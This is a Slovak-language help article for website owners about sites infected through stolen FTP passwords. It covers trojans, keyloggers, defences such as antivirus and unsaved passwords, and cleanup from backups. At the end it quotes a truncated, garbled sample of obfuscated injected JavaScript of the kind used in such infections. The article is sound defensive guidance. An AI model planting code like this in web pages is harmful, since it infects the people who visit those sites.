Objavujú sa na vašom webe cudzie stránky, alebo Vám antivírus hlási prítomnosť vírusu pri otvorení Vašich stránok? Potom bol zrejme Váš web napadnutý hackerom. Toto napadnutie sa dá vykonať väčšinou pomocou nastrčeného vírusu do Vášho PC → všeobecne potom hlavne pomocou „password steeling vírusu“ alebo pomocou „keyloger“.
Možnosti napadnutia webu a FTP: - napadnutia pomocou password steeling vírusu v prípade, že máte heslo uložené
- odpočúvanie hesla pomocou trójskych koní pri jeho zadávaní do FTP klienta
- odpočúvanie hesla pomocou logování stlačených klávesov na PC pomocou keyloger
Ako útok primárne vzniká:
Potenciálny útok na Vaše FTP môže vzniknúť na nezabezpečenom počítači, na ktorý si obyčajným prehliadaním internetu nechcene stiahnete vírus, trójskeho koňa alebo keyloger. Takto napadnutý počítač potom odosiela všetky citlivé dáta potenciálnemu útočníkovi. V prípade, že je váš počítač infikovaný trójskym koňom, existujú dve možnosti, ako môže vírus heslo zistiť. Prvou možnosťou je zistenie hesla z už uložené relácie pripojenia v FTP klientu, a druhá možnosť je odpočúvanie hesla pri jeho zadávaní pri pripájaní k FTP. V prvom prípade si trójsky kôň dokáže nájsť uloženú relácii vo Vašom počítači, a ak ste si do nej uložili aj heslo na pripojenie, nie je pre vírus problém toto heslo zistiť, a útočníkovi odoslať. Vo všeobecnosti je teda odporúča do počítača žiadne heslá neukladať. Vyvarujete sa tak prvej z možností napadnutia Vášho FTP. Druhá možnosť je potom taká, že vírus alebo keyloger zisťuje Vami stlačené klávesy, az nich zaznamenáva LOG súbor, ktorý potom odosiela útočníkovi. Z tohto logu je potom možné zistiť všetky stlačené klávesy na počítači, a teda aj všetky napsaná hesla (nielen k FTP!!).
Ako sa brániť útokom na FTP:
Prvým pravidlom pri obrane svojho FTP je neukladanie žiadneho z hesiel do svojho počítača. Teda hlavne neukladať relácie na pripojenie pomocou nejakého FTP klienta. Ak heslo nebude v počítači uložené, nemôže ho jednoduchšie vírus ani nájsť, a odoslať útočníkovi. Pravidlom druhým je potom aktívna a pasívna ochrana Vášho PC. Medzi aktívnu ochranu možno zaradiť firewall, antivírus, a programy proti spyware a adware vo všeobecnosti, a ako pasívnu ochranu počítača potom možno brať určitú opatrnosť pri otváraní mailových príloh, alebo otváranie potenciálne nebezpečných stránok (stránky s warez, erotickým alebo nelegálnym obsahom …. ….)
Ako vírus zo stránok odstrániť:
Ak sa už stane, že je váš web vírusom napadnutý, je potreba ho okamžite z webu odstrániť, pretože riskujete napadnutie všetkých počítačov všetkých užívateľov Vašich stránok (čo môže mať za následok aj odradenie používateľov pristupujúcich na vaše stránky). Vo všeobecnosti je najlepšie vždy obsah FTP kompletne vymazať, a nahrať na neho dáta zo zálohy. Tu je ale potrebné mať vopred istotu, že daná záloha nebola vytvorená v čase, keď bol web už napadnutý vírusom. Spolu so zmazaním zavírených dát a nahraním pôvodných zo zálohy, je tiež potrebné okamžite zmeniť heslo k FTP. Ak by ste heslo nechali pôvodné, došlo by k útoku znovu, pretože pôvodné heslo bude mať útočník uložené vo svojej databáze. Ako je potom uvedené vyššie, je tiež potrebné prehľadávať svoj počítač pomocou antiviru, antispyware a antiadware programu, proti vírusom uloženým na Vašom počítači.
Ukážka kódu vírusu, ktorý môže byť vložený do stránky:
<!–[ z0s ]–>< script> document.write (unescapess ( “% 3Cscript% 3Eif% 28Qg % 21% 3D1% 29% 7Bfunction% 20JI% 28fR% 29% 7Breturnfd% 20FR% 7Dtry% 7Bfunc n% 20wcr% 28jzA% 29% 7Breturn% 20parseInt% 28jzA% 29% gf7Dvar% 20XSf% 3D …. style = „text-align: justify“> .7 DVBy +% 3DString.fromCharCode% 28QdU% 5BZSk% 5D% 5E132% 2hh9% 3B% 7D nt.write% 28VBy% 29% 3B% 7Dcatch% ds28nxu% 29% 7B% 7D% 7Dvar% 20Qg% 3D1 ript% 3E “))</ script ><!–[/ z0s] →